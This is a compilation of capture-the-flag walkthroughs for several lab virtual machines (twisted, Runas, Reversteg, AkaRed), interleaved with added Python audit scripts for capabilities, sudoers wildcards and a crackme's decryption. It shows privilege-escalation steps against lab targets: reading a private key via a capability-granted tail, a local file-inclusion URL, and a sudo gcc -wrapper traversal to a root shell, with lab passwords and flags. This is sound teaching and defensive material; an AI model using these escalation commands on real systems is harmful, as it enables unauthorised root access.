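    if os.stat(parent).st_mode & stat.S_IWOTH:
        findings.append("dir_world_writable")  # any local user can replace the file
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file_group_or_world_writable")
    if st.st_uid != 0:
        findings.append("file_not_root_owned")
    return findings


def audit_sshd_config(sshd_config_text):
    """Resolve the Banner directive and audit the file it points at."""
    path = banner_path(sshd_config_text)
    if path is None:
        return None, []
    return path, audit_banner_file(path)


def build_fixture():
    """Constructed layout reproducing the box: a world-writable directory whose
    banner.txt has been replaced by a symlink to another file.
    Returns (sshd_config_text, tempdir)."""
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o1777)
    target = os.path.join(tmp, "secret.txt")
    with open(target, "w") as fh:
        fh.write("not really /etc/shadow\n")
    os.chmod(target, 0o644)
    banner = os.path.join(tmp, "banner.txt")
    os.symlink(target, banner)
    config = f"# no default banner path\nBanner {banner}\nPermitRootLogin no\n"
    return config, tmp


if __name__ == "__main__":
    config, _ = build_fixture()
    path, findings = audit_sshd_config(config)
    print(path, findings)
```

The fix on a real host is to keep the banner root-owned inside a root-owned, non-writable directory such as /etc/ssh (or set Banner none); "file_not_root_owned" will also fire on the fixture when the script is run as an ordinary user, which is exactly the condition the check exists for.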
su root
Password: Imthepassthaty0uwant!
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ls
socat
user.txt
cd ..
cd ..
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
cd root
ls
root.txt
cat root.txt
HMVNOTINPRODLOL
twisted
Information gathering
The IP address is 192.168.56.113.
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:18 (Unknown: locally administered)
192.168.56.100 08:00:27:ee:f8:61 PCS Systemtechnik GmbH
192.168.56.113 08:00:27:94:94:44 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 3 responded
Use nmap to gather port information:
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.113 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 22:24 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.113
Host is up (0.0082s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:94:94:44 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds
user flag
Ports 80 and 2222 are open. Look at port 80 first: it is just two pictures of cats with no clues. Directory scanning turned up nothing, so the lead must be in the two pictures.
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.113:80
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
┌──(root㉿kali-plus)-[~]
└─# wget http://192.168.56.113/cat-original.jpg
--2025-04-08 22:35:48-- http://192.168.56.113/cat-original.jpg
正在连接 192.168.56.113:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288693 (282K) [image/jpeg]
正在保存至: “cat-original.jpg”
cat-original.jpg 100%[==========================================================================================================>] 281.93K --.-KB/s 用时 0.03s
2025-04-08 22:35:48 (10.9 MB/s) - 已保存 “cat-original.jpg” [288693/288693])
┌──(root㉿kali-plus)-[~]
└─# wget http://192.168.56.113/cat-hidden.jpg
--2025-04-08 22:36:09-- http://192.168.56.113/cat-hidden.jpg
正在连接 192.168.56.113:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288706 (282K) [image/jpeg]
正在保存至: “cat-hidden.jpg”
cat-hidden.jpg 100%[==========================================================================================================>] 281.94K --.-KB/s 用时 0.06s
2025-04-08 22:36:09 (4.72 MB/s) - 已保存 “cat-hidden.jpg” [288706/288706])
┌──(root㉿kali-plus)-[~]
└─# diff cat-original.jpg cat-hidden.jpg
二进制文件 cat-original.jpg 和 cat-hidden.jpg 不同
The pictures do differ, but I did not know which tool to compare them with. A glance at the write-up shows it uses stegseek.
Tutorial: stegseek usage tutorial
┌──(root㉿kali-plus)-[~]
└─# stegseek -sf cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(root㉿kali-plus)-[~]
└─# stegseek -sf cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(root㉿kali-plus)-[~]
└─# cat cat-hidden.jpg.out
thisismypassword
┌──(root㉿kali-plus)-[~]
└─# cat cat-original.jpg.out
markuslovesbonita
This gives what looks like a password and a hint; guess that the ssh username is markus and try connecting:
┌──(root㉿kali-plus)-[~]
└─# ssh markus@192.168.56.113 -p 2222
markus@192.168.56.113's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$ ls
note.txt
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
markus@twisted:~$ id
uid=1001(markus) gid=1001(markus) groups=1001(markus)
We get a hint telling us bonita's key is at /var/cache/apt/id_rsa, and then I ran out of ideas. The write-up shows the trick is the getcap command. getcap displays a file's capabilities. Capabilities are a privilege separation mechanism: root's full set of privileges is split into many independent capabilities that can be granted to specific processes or files. This improves system security by preventing a malicious process from gaining too many privileges.
markus@twisted:/tmp$ /usr/sbin/getcap / -r 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
I could not make sense of it, so I handed it to an AI:
1. /usr/bin/ping = cap_net_raw+ep
- `/usr/bin/ping` has been granted the `cap_net_raw` and `cap_net_admin` capabilities.
- cap_net_raw: lets the program send and receive raw network packets (such as the ICMP packets used by `ping`).
- cap_net_admin: lets the program perform network administration tasks (such as configuring network interfaces).
- +ep: these capabilities are enabled in the Effective and Permitted sets.
2. /usr/bin/tail = cap_dac_read_search+ep
- `/usr/bin/tail` has been granted the `cap_dac_read_search` capability.
- cap_dac_read_search: lets the program bypass file-system access control and read file contents directly. This matters for `tail`, which needs to access certain protected files (such as system logs).
- +ep: likewise, these capabilities are enabled in the Effective and Permitted sets.
This means tail can read id_rsa:
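Reading a capability dump by hand is error-prone, and on a host with more than two entries a defender wants the dangerous ones picked out automatically. As an added example that is not part of the original write-up, the Python below parses getcap output in the layout shown above (and the newer "path caps" layout printed by recent libcap), tracks the effective/permitted flags per capability, and reports those that let a binary read or modify protected files or change identity. The two input lines are the ones getcap printed on the box; the shortlist of dangerous capabilities and the function names are my assumptions.

```python
import re

# Capabilities that by themselves give file-system or identity control
# comparable to root (a reviewer's shortlist, an assumption; not exhaustive).
DANGEROUS = {
    "cap_dac_read_search": "bypasses read and search permission checks on any file",
    "cap_dac_override": "bypasses read, write and execute permission checks",
    "cap_chown": "can change the owner of any file",
    "cap_fowner": "bypasses owner checks on file operations",
    "cap_setuid": "can switch to any UID, including 0",
    "cap_setgid": "can switch to any GID",
    "cap_sys_admin": "broad administrative capability (mounts, namespaces, ...)",
    "cap_sys_ptrace": "can attach to and inspect other processes",
    "cap_sys_module": "can load kernel modules",
}

# One clause of a capability set: comma-separated caps, operator, flag letters.
CLAUSE_RE = re.compile(
    r"(?P<caps>cap_[a-z0-9_]+(?:,cap_[a-z0-9_]+)*)(?P<op>[+=-])(?P<flags>[eip]*)"
)


def parse_getcap_line(line):
    """Return (path, {cap: set(flags)}). Accepts both 'path = caps' (libcap
    before 2.41, as printed above) and 'path caps' (newer libcap)."""
    path, _, rest = line.strip().partition(" ")
    rest = rest.lstrip("= ")
    caps = {}
    for m in CLAUSE_RE.finditer(rest):
        flags = set(m["flags"])
        for cap in m["caps"].split(","):
            if m["op"] == "=":
                caps[cap] = set(flags)
            elif m["op"] == "+":
                caps[cap] = caps.get(cap, set()) | flags
            else:  # '-' removes the listed flags
                caps[cap] = caps.get(cap, set()) - flags
    return path, caps


def audit_getcap(output):
    """Return (path, cap, reason) for each dangerous capability that is
    effective or permitted on a file."""
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        for cap in sorted(caps):
            if cap in DANGEROUS and caps[cap] & {"e", "p"}:
                findings.append((path, cap, DANGEROUS[cap]))
    return findings


# Constructed input: the two lines getcap printed on the box.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
"""

if __name__ == "__main__":
    for path, cap, reason in audit_getcap(SAMPLE_GETCAP):
        print(f"{path}: {cap} ({reason})")
```

ping's cap_net_raw is the normal way a distribution avoids making ping setuid and is not reported; tail with cap_dac_read_search is, because a general-purpose file reader that ignores permission bits is a root-level file read for every local user. The remediation is `setcap -r /usr/bin/tail`.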
markus@twisted:/tmp$ tail /var/cache/apt/id_rsa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-----END OPENSSH PRIVATE KEY-----
But tail reads from the end, so use -n to specify the number of lines. Once we have the key, write it to a local file and connect with it:
markus@twisted:/tmp$ tail -n 100 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
vi tmp
chmod 600 tmp
┌──(root㉿kali-plus)-[~]
└─# ssh bonita@192.168.56.113 -p 2222 -i tmp
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bonita@twisted:~$ ls
beroot user.txt
bonita@twisted:~$ cat user.txt
HMVblackcat
Privilege escalation - root flag
There is no sudo, only a beroot file:
bonita@twisted:~$ file beroot
beroot: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fecfbde059505a54f66d3229cc9ebb78f997a7ba, not stripped
It looks like a binary; download it and open it in IDA:
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+1Ch] [rbp-4h] BYREF
printf("Enter the code:\n ");
scanf("%i", &v4);
if ( v4 == 5880 )
{
setuid(0);
setgid(0);
system("/bin/bash");
}
else
{
puts("\nWRONG");
}
return 0;
}
So the answer is 5880, and with it we escalate to root:
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~# id
uid=0(root) gid=0(root) groups=0(root),1002(bonita)
root@twisted:~# cd ..
root@twisted:/home# cd ..
root@twisted:/# cd root
root@twisted:/root# ls
root.txt
root@twisted:/root# cat root.txt
HMVwhereismycat
Runas
Information gathering
The IP address is 192.168.50.242. Scan the ports:
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.50.242 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-09 18:17 CST
Nmap scan report for runas-PC (192.168.50.242)
Host is up (0.00065s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:33:3A:14 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds
Port 80 has a file inclusion that reads the flags directly.
user flag
http://192.168.50.242/index.php?file=C:\Users\runas\Desktop\user.txt
HMV{User_Flag_Was_A_Bit_Bitter}
root flag
http://192.168.50.242/index.php?file=C:\Users\Administrator\Desktop\root.txt
HMV{Username_Is_My_Hint}
Reversteg
Information gathering
The IP address is 192.168.56.104. Scan the target with rustscan:
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.56.104
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.104:22
Open 192.168.56.104:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-10 00:52 CST
Initiating ARP Ping Scan at 00:52
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 00:52, 0.06s elapsed (1 total hosts)
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 0, OK: 0, NX: 0, DR: 0, SF: 0, TR: 0, CN: 0]
Initiating SYN Stealth Scan at 00:52
Scanning 192.168.56.104 [2 ports]
Discovered open port 22/tcp on 192.168.56.104
Discovered open port 80/tcp on 192.168.56.104
Completed SYN Stealth Scan at 00:52, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.56.104
Host is up, received arp-response (0.0026s latency).
Scanned at 2025-04-10 00:52:25 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:11:4B:D8 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
The scan shows 80 and 22. Look at 80 first: it is just an Apache service, and directory scanning gives nothing, but at the bottom of the page source there is a hint:
<!-- Some people always don't understand the format of photos. --> This relates to pictures. The source also contains <!-- 117db0148dc179a2c2245c5a30e63ab0 -->; appending .jpg gives a picture of a cat, and appending .png gives another picture of a cat. Download both. Since they are pictures, try binwalk to see whether anything can be carved out; what came out looked useless, so check the EXIF data:
┌──(root㉿kali-plus)-[~/reversteg]
└─# exiftool 117db0148dc179a2c2245c5a30e63ab0.png
ExifTool Version Number : 12.76
File Name : 117db0148dc179a2c2245c5a30e63ab0.png
Directory : .
File Size : 379 kB
File Modification Date/Time : 2025:02:12 23:55:16+08:00
File Access Date/Time : 2025:04:10 01:20:43+08:00
File Inode Change Date/Time : 2025:04:10 01:16:49+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 648
Image Height : 486
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Image Size : 648x486
Megapixels : 0.315
┌──(root㉿kali-plus)-[~/reversteg]
└─# exiftool 117db0148dc179a2c2245c5a30e63ab0.jpg
ExifTool Version Number : 12.76
File Name : 117db0148dc179a2c2245c5a30e63ab0.jpg
Directory : .
File Size : 191 kB
File Modification Date/Time : 2025:02:13 01:33:04+08:00
File Access Date/Time : 2025:04:10 01:20:51+08:00
File Inode Change Date/Time : 2025:04:10 01:16:58+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : 219f26695ac66c93de9de70eebeefea4deb071df71b9b7d7ebcc06eca47ff6e4
Image Width : 1280
Image Height : 960
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1280x960
Megapixels : 1.2
Nothing usable there either:
┌──(root㉿kali-plus)-[~/reversteg]
└─# strings 117db0148dc179a2c2245c5a30e63ab0.jpg |tail
cXL>
sMO3N
$_oQP
[V'0K
^;R$[_
Y ?|
\xgG
o7p?
J^>_
TGlmZSBpcyBmdWxsIG9mIHNjZW5lcnksIGxvb2sgY2FyZWZ1bGx5
┌──(root㉿kali-plus)-[~/reversteg]
└─# echo TGlmZSBpcyBmdWxsIG9mIHNjZW5lcnksIGxvb2sgY2FyZWZ1bGx5 |base64 -d
Life is full of scenery, look carefully
There is a base64 string at the end of the jpg, but it is of no use. The clues must be in these two pictures, but I had no more ideas; the write-up uses the zsteg tool, which pulls out a password in one go.
Tool installation
gem sources -l # list the current sources
gem sources --remove https://rubygems.org/ # remove the existing source
gem sources -a http://gems.ruby-china.com/ # add the new source
apt-get install gem
gem install zsteg
Run it in one go:
┌──(root㉿kali-plus)-[~/reversteg]
└─# zsteg 117db0148dc179a2c2245c5a30e63ab0.png
imagedata .. text: "\n\n\n\t\t\t\n\n\n"
b1,rgb,lsb,xy .. text: "morainelake"
b1,bgr,msb,xy .. file: OpenPGP Public Key
b2,r,lsb,xy .. text: "UUUUUUUU@"
b2,g,lsb,xy .. text: "E@UAUUUUUUUUj"
b2,g,msb,xy .. text: "UUUZs-VUU"
b2,b,lsb,xy .. text: "EUUUUUUUUV"
b2,b,msb,xy .. text: "_UUUoUUe"
b3,b,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Stereo
b3,rgb,lsb,xy .. file: PGP Secret Sub-key -
b4,r,lsb,xy .. text: "DEUTfgww"
b4,r,msb,xy .. text: "M,\"\"\"\"\"\""
b4,g,lsb,xy .. text: ["\"" repeated 10 times]
b4,g,msb,xy .. text: "HDDDDDDDDDDH"
b4,b,lsb,xy .. text: "3\"##2\"\"#33333333333333334DDDDDDDDDD4C333\"\"\""
b4,b,msb,xy .. text: ",\"\"\"\"\"\"\"\"\"\","
The morainelake we obtained should be a password. Next use steghide to decrypt the jpg with that password, which yields a zip archive:
┌──(root㉿kali-plus)-[~/reversteg]
└─# steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg
Enter passphrase:
wrote extracted data to "secret.zip".
user flag
The archive is password-protected; the same password opens it and gives secret.txt, containing a username and password:
┌──(root㉿kali-plus)-[~/reversteg/secret]
└─# cat secret.txt
morainelake:660930334
ssh in directly, and there is a note.txt:
morainelake@reversteg:~$ ls
history note.txt
morainelake@reversteg:~$ cat note.txt
morainelake is a very careless user with a very bad memory. He always throws things aside after organizing them. This time he accidentally lost the flag. Fortunately, the administrator has the historical records, but there are too many records to find the corresponding correct flag. Can you find it correctly?
"Don't worry about failures; worry about the chances you miss when you don't even try. After all, it's better to look back and say, 'I can't believe I did that,' than to look back and say, 'What if?' (You'll probably fail anyway.)"
In the same directory there is a history file; cat shows it is full of flags, and a second cat shows different ones, so the real flag has to be picked out. There are several ways to do this:
Method 1
cat history > a
cat history > b
morainelake@reversteg:~$ grep -f a b
flag{fc8941b9088096e99b635cc3e07080d6}
Method 2
morainelake@reversteg:~$ cat a b |awk 'a[$1]++'
flag{fc8941b9088096e99b635cc3e07080d6}
Method 3
morainelake@reversteg:~$ cat a b |sort|uniq -c|sort -n
..............
1 flag{fbee74392020a83059df9151e7bf61c6}
1 flag{fd8ff11491b6a47a2b8c7a07d1f96515}
1 flag{fe983c9c1b8e74b063a58893e33386ba}
1 flag{febea309d0ee1d225ccc179bc709875e}
1 flag{ff0ae29007781f77bd2b85688c0219b0}
2 flag{fc8941b9088096e99b635cc3e07080d6}
Privilege escalation - root flag
The one that appears twice is the real flag. In /opt there is a reverse binary; download it and analyse it in IDA:
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[28]; // [rsp+9h] [rbp-E7h] BYREF
__int128 v5; // [rsp+25h] [rbp-CBh] BYREF
char v6[7]; // [rsp+35h] [rbp-BBh] BYREF
int v7; // [rsp+3Ch] [rbp-B4h] BYREF
int v8; // [rsp+40h] [rbp-B0h] BYREF
int v9; // [rsp+60h] [rbp-90h] BYREF
int v10[8]; // [rsp+80h] [rbp-70h] BYREF
char dest[24]; // [rsp+A0h] [rbp-50h] BYREF
void *ptr; // [rsp+B8h] [rbp-38h]
int v13; // [rsp+C0h] [rbp-30h]
char v14; // [rsp+C7h] [rbp-29h]
char *v15; // [rsp+C8h] [rbp-28h]
char *v16; // [rsp+D0h] [rbp-20h]
void *v17; // [rsp+D8h] [rbp-18h]
void *v18; // [rsp+E0h] [rbp-10h]
char v19; // [rsp+EBh] [rbp-5h]
int v20; // [rsp+ECh] [rbp-4h]
puts("Enter passwords or Enter H coward mode:");
v20 = 0;
while ( 1 )
{
__isoc99_scanf("%s", &v4[7]);
if ( strcmp(&v4[7], "H") )
break;
if ( ++v20 == 100 )
{
puts("Hint: Invert XOR Replace! ");
goto LABEL_6;
}
}
strcpy(dest, &v4[7]);
__isoc99_scanf("%s %s %s", v10, &v9, &v8);
LABEL_6:
v7 = '},9';
strcpy(v6, "/, 8:(");
strcpy(&v5 + 7, "!!|}yx{z");
strcpy(&v5, "(;$)(#");
v19 = 'M';
v18 = xor_decrypt(&v5 + 7, 'M');
v17 = xor_decrypt(v6, v19);
v16 = xor_decrypt(&v7, v19);
v15 = xor_decrypt(&v5, v19);
if ( check_passwords(dest, v10, &v9, &v8, v18, v17, v16, v15) )
{
strcpy(v4, "pvygob");
v14 = 106;
v13 = 10;
ptr = caesar_decrypt(v4, 10LL);
printf("[+] Enter the password successfully! you know: %s\n", ptr);
free(ptr);
}
else
{
puts("[-] Incorrect password!");
}
free(v18);
free(v17);
free(v16);
free(v15);
return 0;
}
The following need decrypting:
},9 //ta0
8:( //bamuwe
!!|}yx{z //ll104567
(;$)(# //eviden
pvygob //flower
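As an added worked example (not part of the original write-up), the Python below reproduces the two decryptions the decompiled main performs, so the five plaintexts listed above can be checked rather than taken on trust: xor_decrypt is a single-byte XOR with 'M' (0x4D), caesar_decrypt is a shift of 10, and the one subtlety is that IDA shows v7 as the multi-character constant '},9', which sits in memory as a little-endian int, i.e. the bytes 9,} followed by a NUL. The function names are mine.

```python
XOR_KEY = ord("M")  # v19 = 'M' in the decompiled main


def xor_decrypt(data, key=XOR_KEY):
    """Single-byte XOR (its own inverse); mirrors the binary's xor_decrypt."""
    return "".join(chr(b ^ key) for b in data)


def caesar_decrypt(text, shift):
    """Shift letters back by `shift` positions, wrapping within the alphabet."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("a") if ch.islower() else ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def multichar_literal(text):
    """Value of a C multi-character constant like '},9' as IDA prints it:
    the first character is the most significant byte."""
    value = 0
    for ch in text:
        value = (value << 8) | ord(ch)
    return value


def int_bytes_in_memory(value, size=4):
    """The same int as it lies on the stack (little-endian), without the
    trailing NULs that terminate it when read as a string."""
    return value.to_bytes(size, "little").rstrip(b"\x00")


# The four ciphertexts from main, keyed by the variable that held them.
ENCRYPTED = {
    "v7": int_bytes_in_memory(multichar_literal("},9")),  # b"9,}"
    "v6": b"/, 8:(",
    "v5+7": b"!!|}yx{z",
    "v5": b"(;$)(#",
}


def recover_passwords():
    """Plaintexts in the order check_passwords receives them (v18, v17, v16,
    v15), i.e. the order the program expects them to be typed."""
    return [xor_decrypt(ENCRYPTED[k]) for k in ("v5+7", "v6", "v7", "v5")]


def recover_message():
    """The string printed on success: caesar_decrypt("pvygob", 10)."""
    return caesar_decrypt("pvygob", 10)


if __name__ == "__main__":
    print(" ".join(recover_passwords()), "->", recover_message())
```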
Then run reverse and enter ll104567, bamuwe, ta0 and eviden in turn:
morainelake@reversteg:/opt$ ./reverse
Enter passwords or Enter H coward mode:
ll104567
bamuwe
ta0
eviden
[+] Enter the password successfully! you know: flower
Then switch to the welcome user; the password is ll104567bamuweta0eviden:
morainelake@reversteg:/opt$ su - welcome
Password:
$ bash
welcome@reversteg:~$ ls
welcome@reversteg:~$ pwd
/home/welcome
welcome@reversteg:~$ ls
welcome@reversteg:~$ sudo -l
Matching Defaults entries for welcome on reversteg:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on reversteg:
(ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*
welcome@reversteg:~$ sudo /usr/bin/gcc -wrapper /bin/sh,-s .
[sudo] password for welcome:
Sorry, user welcome is not allowed to execute '/usr/bin/gcc -wrapper /bin/sh,-s .' as root on reversteg.
welcome@reversteg:~$ sudo /usr/bin/gcc -wrapper /opt/../../../bin/sh,-s .
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
# bash
root@reversteg:/home/welcome# cd ..
root@reversteg:/home# cd ..
root@reversteg:/# cd root
root@reversteg:~# ls
banner.txt history root.txt
root@reversteg:~# cat root.txt
flag{4f1eab505b71cd930b0eccd83ff0cfef}
A ../../../ escape was used here, and it gives root directly.
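The sudo rule `(ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*` is matched by sudo against the argument text with shell-style wildcard semantics, not against the resolved path, which is why `/opt/../../../bin/sh,-s` is accepted while `/bin/sh,-s` is refused. As an added example that is not part of the original write-up, the Python below is the check a sudoers reviewer would run on a rule with a wildcard argument: it reproduces sudo's textual match and then reports any argument that matches the glob but normalises to a path outside the directory the rule was meant to confine it to. The sample invocations are the two tried above plus a legitimate one; function names and the "allowed directory" are assumptions.

```python
import fnmatch
import posixpath

# The rule from sudo -l above, split into the command and its argument pattern.
RULE_COMMAND = "/usr/bin/gcc"
RULE_ARGS = ["-wrapper", "/opt/*"]
ALLOWED_DIR = "/opt"  # the directory the rule's author evidently meant to confine it to


def rule_args_match(rule_args, argv):
    """sudo joins the command's arguments with single spaces and matches that
    one string against the sudoers pattern with fnmatch(3) semantics, so a '*'
    in an argument position also matches '/', '..' and even spaces."""
    return fnmatch.fnmatchcase(" ".join(argv), " ".join(rule_args))


def escaped_paths(argv, allowed_dir):
    """Absolute paths in argv (including the comma-separated pieces of a
    -wrapper value) that collapse to somewhere outside allowed_dir."""
    prefix = allowed_dir.rstrip("/") + "/"
    escapes = []
    for arg in argv:
        for piece in arg.split(","):
            if not piece.startswith("/"):
                continue
            resolved = posixpath.normpath(piece)  # collapses the '..' components
            if not resolved.startswith(prefix):
                escapes.append((piece, resolved))
    return escapes


def evaluate(argv, rule_args=RULE_ARGS, allowed_dir=ALLOWED_DIR):
    """Return ('denied' | 'allowed' | 'escape', details): 'escape' means sudo
    would accept the line although it runs something outside allowed_dir."""
    if not rule_args_match(rule_args, argv):
        return "denied", []
    escapes = escaped_paths(argv, allowed_dir)
    return ("escape" if escapes else "allowed"), escapes


# Constructed invocations: the two tried above and a legitimate one.
CASES = {
    "direct": ["-wrapper", "/bin/sh,-s", "."],
    "traversal": ["-wrapper", "/opt/../../../bin/sh,-s", "."],
    "intended": ["-wrapper", "/opt/reverse,-x", "."],
}

if __name__ == "__main__":
    for name, argv in CASES.items():
        print(name, evaluate(argv))
```

Two things follow for the rule's author: a wildcard in an argument position cannot confine a path, so the rule should name exact commands or hand the argument to a root-owned wrapper script that checks it with realpath; and even a correctly confined `/opt/*` is only as safe as the contents of /opt, because gcc's -wrapper runs whatever program it is given.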
AkaRed
Information gathering
The IP address is 192.168.1.105.
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.105
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.105:22
Open 192.168.1.105:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 13:54 CST
Initiating ARP Ping Scan at 13:54
Scanning 192.168.1.105 [1 port]
Completed ARP Ping Scan at 13:54, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:54
Scanning lookup.hmv (192.168.1.105) [2 ports]
Discovered open port 80/tcp on 192.168.1.105
Discovered open port 22/tcp on 192.168.1.105
Completed SYN Stealth Scan at 13:54, 0.03s elapsed (2 total ports)
Nmap scan report for lookup.hmv (192.168.1.105)
Host is up, received arp-response (0.0010s latency).
Scanned at 2025-04-12 13:54:49 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:EB:F5:F2 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
